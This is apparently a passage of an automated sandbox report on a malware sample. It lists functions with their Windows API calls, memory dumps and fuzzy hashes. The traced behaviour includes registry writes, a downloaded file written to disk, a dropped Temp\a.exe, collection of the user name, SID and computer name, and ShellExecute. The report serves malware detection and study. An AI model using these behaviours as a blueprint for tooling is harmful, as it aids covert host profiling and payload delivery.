                                          • RegCloseKey.ADVAPI32(?,?,00000400,00000000,00000001,?), ref: 01003E02
                                          • RegCreateKeyExA.ADVAPI32(80000001,00000001,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 01003EF1
                                          • RegOpenKeyExA.ADVAPI32(80000001,00000001,00000000,00000002,80000001), ref: 01003F10
                                          • RegSetValueExA.ADVAPI32(80000001,?,00000000,00000001,?,?), ref: 01003F3E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Value$CloseCreateOpenQuery
                                          • String ID:
                                          • API String ID: 980562271-0
                                          • Opcode ID: 7048ee135e2413d798d2436513a221971668e1058c5f6d12fbcf530ed245fe62
                                          • Instruction ID: 4fbfc52904ee52d332d4dc483f16675d558e70386a3c4da378cd51e2b54c44e7
                                          • Opcode Fuzzy Hash: 7048ee135e2413d798d2436513a221971668e1058c5f6d12fbcf530ed245fe62
                                          • Instruction Fuzzy Hash: AB61E571210109AFFB1ACF28CC85BED7B66FF45314F60825CF9859A2C5D779DA848B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01012943, Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,01012875), ref: 01012965
                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 010129BF
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01012875,?,000000FF,00000000,00000000), ref: 01012A4D
                                          • __dosmaperr.LIBCMT ref: 01012A54
                                          • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 01012A91
                                            • Part of subcall function 01012CB9: __dosmaperr.LIBCMT ref: 01012CEE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                          • String ID:
                                          • API String ID: 1206951868-0
                                          • Opcode ID: 01141cc06fe275a45b9c1c06c2d098b1d9257731ff3e0d9c9546f658d4d43fa9
                                          • Instruction ID: 291ea6d8ae5b5687608f7e680d6df09be376d95c3d6311cc4cb10432144ee313
                                          • Opcode Fuzzy Hash: 01141cc06fe275a45b9c1c06c2d098b1d9257731ff3e0d9c9546f658d4d43fa9
                                          • Instruction Fuzzy Hash: F2416E76900249AFDB34DFA9D8449AFBBF9FF88300B24452DF996D3214E7389845CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01006A0B, Relevance: 7.6, APIs: 5, Instructions: 140networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 01006A27
                                          • InternetReadFile.WININET(?,?,?,?), ref: 01006A38
                                          • CloseHandle.KERNEL32(00000000), ref: 01006A43
                                          • InternetCloseHandle.WININET(?), ref: 01006A52
                                          • InternetCloseHandle.WININET(00000000), ref: 01006A55
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CloseHandleInternet$File$ReadWrite
                                          • String ID:
                                          • API String ID: 567989605-0
                                          • Opcode ID: b1a1e0feb289bd406b7cdfbbc8e59f30159f76be11f2df57875a13b9131e2a2c
                                          • Instruction ID: a2dc7d8f31e1eeb04b6334a5c933bd2c4e15c1613126f09811d51143bdb7b1f5
                                          • Opcode Fuzzy Hash: b1a1e0feb289bd406b7cdfbbc8e59f30159f76be11f2df57875a13b9131e2a2c
                                          • Instruction Fuzzy Hash: 58412871A00109ABEB15DFA4CC84AEE77BAEF55310F144268F984E31D4D73AEAD4CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101C807, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 0101C81F
                                            • Part of subcall function 01016601: HeapFree.KERNEL32(00000000,00000000,?,010156FE), ref: 01016617
                                            • Part of subcall function 01016601: GetLastError.KERNEL32(?,?,010156FE), ref: 01016629
                                          • _free.LIBCMT ref: 0101C831
                                          • _free.LIBCMT ref: 0101C843
                                          • _free.LIBCMT ref: 0101C855
                                          • _free.LIBCMT ref: 0101C867
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 8c582b2b135a847fd58f1640c32550e062cffc65207e8597c32734282c73f0f3
                                          • Instruction ID: 091ca18e8cd6ec5b7abb977e51f0b400bb250a7573821a8908d4fb824eb1296a
                                          • Opcode Fuzzy Hash: 8c582b2b135a847fd58f1640c32550e062cffc65207e8597c32734282c73f0f3
                                          • Instruction Fuzzy Hash: EAF04F32545200E7E660EB98EAC4C56B7DDAB086207540C59F5C8D750CCB7FF8808AA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101AED3, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free
                                          • String ID: *?
                                          • API String ID: 269201875-2564092906
                                          • Opcode ID: 2443434e187e1b979bea4c483cc1f5e7adc4037d4bb0d9801d41bb1f01b7c5b1
                                          • Instruction ID: 9039f85e47cc2341b8fbf1c8fc6ae1cc3f0cbca3aebe647c039f4a42dbfb3b69
                                          • Opcode Fuzzy Hash: 2443434e187e1b979bea4c483cc1f5e7adc4037d4bb0d9801d41bb1f01b7c5b1
                                          • Instruction Fuzzy Hash: AF612DB5E00219DFDB15CFA8C8809EDFBF5EF48310B1581AAE895E7344D779AE418B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101980A, Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _strrchr
                                          • String ID:
                                          • API String ID: 3213747228-0
                                          • Opcode ID: 9c1b9633bf2ebb0c38044de2cea86c35c0b20e39aea4a82805dce46aa4bcbc2e
                                          • Instruction ID: f72752e97603dca712855a0a54f0d69844449f0ea617cb61aed5bdb499330145
                                          • Opcode Fuzzy Hash: 9c1b9633bf2ebb0c38044de2cea86c35c0b20e39aea4a82805dce46aa4bcbc2e
                                          • Instruction Fuzzy Hash: 2DB137329042469FDF11CF2CC8A07EEBBF5EF55318F5841AAE9C59B249D63C9905CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0102166E, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 0102173E
                                          • _free.LIBCMT ref: 01021767
                                          • SetEndOfFile.KERNEL32(00000000,0101DB46,00000000,0101649E,?,?,?,?,?,?,?,0101DB46,0101649E,00000000), ref: 01021799
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,0101DB46,0101649E,00000000,?,?,?,?,00000000), ref: 010217B5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFileLast
                                          • String ID:
                                          • API String ID: 1547350101-0
                                          • Opcode ID: fc08f1f209b1c093f1180b7233765cb4025b6827f8194b63a226be8f82317495
                                          • Instruction ID: a68d9eed06af2479bafdf7bf38b24c3a7ca83e976d0877e2d5bf939abd7ecd5b
                                          • Opcode Fuzzy Hash: fc08f1f209b1c093f1180b7233765cb4025b6827f8194b63a226be8f82317495
                                          • Instruction Fuzzy Hash: AF41D7329006169BDB25AFBCCC44ADE7BF9BF98330F240150F9A4AB194EA39D8448760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010042C0, Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 01004316
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Version
                                          • String ID:
                                          • API String ID: 1889659487-0
                                          • Opcode ID: fd96f1be90f9c7737c3816c81bcd34b4f5ebcea68cf4c68c188349e23a31237a
                                          • Instruction ID: c6e4b9f1dcc1e0c2811b37edcc6cfdda5eb7a22a7157be181f15b509b22f4e0e
                                          • Opcode Fuzzy Hash: fd96f1be90f9c7737c3816c81bcd34b4f5ebcea68cf4c68c188349e23a31237a
                                          • Instruction Fuzzy Hash: 04316E70D002199BFB25BF68DC497DEBB74EF41310F5042A8EE80972C5EB754A8487D5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101AE04, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 01012687: _free.LIBCMT ref: 01012695
                                            • Part of subcall function 0101BDDB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,010211E0,?,00000000,00000000), ref: 0101BE7D
                                          • GetLastError.KERNEL32 ref: 0101AE6C
                                          • __dosmaperr.LIBCMT ref: 0101AE73
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0101AEB2
                                          • __dosmaperr.LIBCMT ref: 0101AEB9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                          • String ID:
                                          • API String ID: 167067550-0
                                          • Opcode ID: a9f767d01d967dcccac6f15b98a0a971fdc6ffa46efd0983535b2406316e2dea
                                          • Instruction ID: d089dc8b21200aec8709ae5b3373d1be486fc91935e9e4780f0c5587f13baef7
                                          • Opcode Fuzzy Hash: a9f767d01d967dcccac6f15b98a0a971fdc6ffa46efd0983535b2406316e2dea
                                          • Instruction Fuzzy Hash: 1B21B37170124AEFDB216FA98C808ABB7EDEF143787108559F9A89714CE73DEC0087A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01016EF2, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,01012605,?,?,?,?,01013272,?), ref: 01016EF7
                                          • _free.LIBCMT ref: 01016F54
                                          • _free.LIBCMT ref: 01016F8A
                                          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01012605,?,?,?,?,01013272,?), ref: 01016F95
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: 112e622e78e08c6817a79fd8929dd15218434386692922e480739f8a93c2f0d1
                                          • Instruction ID: 63b173451f31343fff6951040d110b841c0c6720ae1818fb4ca2c903dd004c65
                                          • Opcode Fuzzy Hash: 112e622e78e08c6817a79fd8929dd15218434386692922e480739f8a93c2f0d1
                                          • Instruction Fuzzy Hash: AF110A32245103ABD77136785CC4DAF39998BD5275BA1022CF6E8861CCFEAF88154310
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01017049, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,0101320C,01016627,?,?,010156FE), ref: 0101704E
                                          • _free.LIBCMT ref: 010170AB
                                          • _free.LIBCMT ref: 010170E1
                                          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0101320C,01016627,?,?,010156FE), ref: 010170EC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: 924fd7e8db42ac060fb0f0b3f232202cbf8f63a481447abc8dce9bbdb4ad4732
                                          • Instruction ID: d8c55fc1fbb87f953a5c9e788cfa79dfaa4b05b812a62ed9ee605d7f61bbfe4f
                                          • Opcode Fuzzy Hash: 924fd7e8db42ac060fb0f0b3f232202cbf8f63a481447abc8dce9bbdb4ad4732
                                          • Instruction Fuzzy Hash: AB110836240703EBD77336B89CC0DAF7A9E9BC5271B610264F6E8821CCEE6E88155320
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101773C, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,010178A1,00000000,?,0101E208,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 01017752
                                          • GetLastError.KERNEL32(?,0101E208,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,010178A1,00000000,00000104,?), ref: 0101775C
                                          • __dosmaperr.LIBCMT ref: 01017763
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorFullLastNamePath__dosmaperr
                                          • String ID:
                                          • API String ID: 2398240785-0
                                          • Opcode ID: 40d147bd4cac057f5908d890c8c9337b81ac043f9723e43511604b878ce12e3b
                                          • Instruction ID: 0b83c344fe50284bfe553218cc2286d7d43aca9a144f9be6b2e4d066aeffe55a
                                          • Opcode Fuzzy Hash: 40d147bd4cac057f5908d890c8c9337b81ac043f9723e43511604b878ce12e3b
                                          • Instruction Fuzzy Hash: 21F04432201116BBCB311FBADC08D9AFFA9FF552B07108551FAA9C6514D739E851C7D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010177A5, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,010178A1,00000000,?,0101E193,00000000,00000000,010178A1,?,?,00000000,00000000,00000001), ref: 010177BB
                                          • GetLastError.KERNEL32(?,0101E193,00000000,00000000,010178A1,?,?,00000000,00000000,00000001,00000000,00000000,?,010178A1,00000000,00000104), ref: 010177C5
                                          • __dosmaperr.LIBCMT ref: 010177CC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorFullLastNamePath__dosmaperr
                                          • String ID:
                                          • API String ID: 2398240785-0
                                          • Opcode ID: f02a4e610442b52f7b4e90e54947e2d45737ff4388851c83d57d0198ff6e69d4
                                          • Instruction ID: b33fb3290341552fd3b2f46b3df5e76c987c7c591983d668871579260ef23f3c
                                          • Opcode Fuzzy Hash: f02a4e610442b52f7b4e90e54947e2d45737ff4388851c83d57d0198ff6e69d4
                                          • Instruction Fuzzy Hash: F3F04432240116BBCB315FBADC08C9AFFA9FF552B07218551FA99C6514DB39E851CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01021B95, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          • WriteConsoleW.KERNEL32(01003D80,?,0102E0A8,00000000,01003D80,?,0101EFD2,01003D80,00000001,01003D80,01003D80,?,0101882C,00000000,?,01003D80), ref: 01021BAC
                                          • GetLastError.KERNEL32(?,0101EFD2,01003D80,00000001,01003D80,01003D80,?,0101882C,00000000,?,01003D80,00000000,01003D80,?,01018D80,01003D80), ref: 01021BB8
                                            • Part of subcall function 01021B7E: CloseHandle.KERNEL32(FFFFFFFE,01021BC8,?,0101EFD2,01003D80,00000001,01003D80,01003D80,?,0101882C,00000000,?,01003D80,00000000,01003D80), ref: 01021B8E
                                          • ___initconout.LIBCMT ref: 01021BC8
                                            • Part of subcall function 01021B40: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,01021B6F,0101EFBF,01003D80,?,0101882C,00000000,?,01003D80,00000000), ref: 01021B53
                                          • WriteConsoleW.KERNEL32(01003D80,?,0102E0A8,00000000,?,0101EFD2,01003D80,00000001,01003D80,01003D80,?,0101882C,00000000,?,01003D80,00000000), ref: 01021BDD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: ddd2b4b5ebe5c33531e3c76508d570cd9ff4ee1c52679a3be8dcc2d94bc8ccc0
                                          • Instruction ID: 48cc8afb411c891bbff742b09070046ee628a7053575518ca56c792f8d9362be
                                          • Opcode Fuzzy Hash: ddd2b4b5ebe5c33531e3c76508d570cd9ff4ee1c52679a3be8dcc2d94bc8ccc0
                                          • Instruction Fuzzy Hash: B3F01C3A101125FBCF331FE5DC14EC93F6AFF486A0F114050FB9885125D6368820DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101583C, Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 01015845
                                            • Part of subcall function 01016601: HeapFree.KERNEL32(00000000,00000000,?,010156FE), ref: 01016617
                                            • Part of subcall function 01016601: GetLastError.KERNEL32(?,?,010156FE), ref: 01016629
                                          • _free.LIBCMT ref: 01015858
                                          • _free.LIBCMT ref: 01015869
                                          • _free.LIBCMT ref: 0101587A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 0087e638908dd0717cdf56d59a41db6131dcb90dff24adead7b4b0ace411de16
                                          • Instruction ID: 712151c01e48b6701a78c784d601450ef8679cfc7d537a0fa1daab23555716e1
                                          • Opcode Fuzzy Hash: 0087e638908dd0717cdf56d59a41db6131dcb90dff24adead7b4b0ace411de16
                                          • Instruction Fuzzy Hash: 70E0B679824121DA8B227F65BC88489BBBAF75EB113014C16F4E05221CCB7F05629FD9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01014EAB, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Users\user\AppData\Local\Temp\a.exe
                                          • API String ID: 0-2503798518
                                          • Opcode ID: f11334a540fe2b7fa6fee2be82196808a27ba672b615cf7f3cec768b52201a6c
                                          • Instruction ID: f20c8c36c24474956031afd293af8cb6aa8e06a2709979f5aefa844ddcb3dfcc
                                          • Opcode Fuzzy Hash: f11334a540fe2b7fa6fee2be82196808a27ba672b615cf7f3cec768b52201a6c
                                          • Instruction Fuzzy Hash: 5B417371A04219ABDB21DF9DD884DEEBBFCEB99310F1400AAE584D7358D7798A41C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: rnyuf.exe PID: 6908 Parent PID: 6736 rnyuf.exeCOMMON

                                          Executed Functions

                                          Function 00F0C0A0, Relevance: 14.4, APIs: 5, Strings: 2, Instructions: 2128libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F04010: GetVersionExW.KERNEL32(0000011C,?,?,80000001), ref: 00F04066
                                            • Part of subcall function 00F042C0: GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00F04316
                                            • Part of subcall function 00F01DA0: GetUserNameW.ADVAPI32(00000000,00F04DB3), ref: 00F01DCA
                                            • Part of subcall function 00F01DA0: GetProcessHeap.KERNEL32(00000008,00F04DB3), ref: 00F01DDF
                                            • Part of subcall function 00F01DA0: HeapAlloc.KERNEL32(00000000), ref: 00F01DE2
                                            • Part of subcall function 00F01DA0: GetUserNameW.ADVAPI32(00000000,00F04DB3), ref: 00F01DF0
                                            • Part of subcall function 00F01DA0: LookupAccountNameW.ADVAPI32(00000000,?,00000000,00F04DB3,00000000,?,?), ref: 00F01E13
                                            • Part of subcall function 00F01DA0: GetProcessHeap.KERNEL32(00000008,00F04DB3), ref: 00F01E1E
                                            • Part of subcall function 00F01DA0: HeapAlloc.KERNEL32(00000000), ref: 00F01E21
                                            • Part of subcall function 00F01DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 00F01E31
                                            • Part of subcall function 00F01DA0: HeapAlloc.KERNEL32(00000000), ref: 00F01E34
                                            • Part of subcall function 00F01DA0: LookupAccountNameW.ADVAPI32(00000000,?,00000000,00F04DB3,00000000,?,?), ref: 00F01E5E
                                            • Part of subcall function 00F01DA0: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00F01E71
                                          • LoadLibraryA.KERNEL32(00000000), ref: 00F0CABA
                                          • GetProcAddress.KERNEL32(00000000,000002A8), ref: 00F0CB14
                                          • FreeLibrary.KERNEL32(00000000), ref: 00F0CB1F
                                          • GetUserNameW.ADVAPI32(?,00000100), ref: 00F0CB92
                                          • GetComputerNameExW.KERNEL32(00000002,?,00000100,?,?,?), ref: 00F0CC72
                                            • Part of subcall function 00F0EBB0: Concurrency::cancel_current_task.LIBCPMT ref: 00F0EC64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: HeapName$AllocProcessUser$AccountLibraryLookupVersion$AddressComputerConcurrency::cancel_current_taskConvertFreeLoadProcString
                                          • String ID: 152138533219$1e680d
                                          • API String ID: 1144133639-2430080948
                                          • Opcode ID: 41b36fab9435792deebacc8a6aff96802b54912fde4944273052bccbdf4d86eb
                                          • Instruction ID: 4dce1db9cc72df2f7570431fb03433e1d64a2c6337046ba438d2383de8167a33
                                          • Opcode Fuzzy Hash: 41b36fab9435792deebacc8a6aff96802b54912fde4944273052bccbdf4d86eb
                                          • Instruction Fuzzy Hash: FCF22A71A002059BEF2CDB28CC9579EB776AF81304F50879CF409972D6DB399AC4BB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F02A20, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 295COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShellExecuteA.SHELL32(00000000,00000001,?,?,00000000,00000000), ref: 00F02A8D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
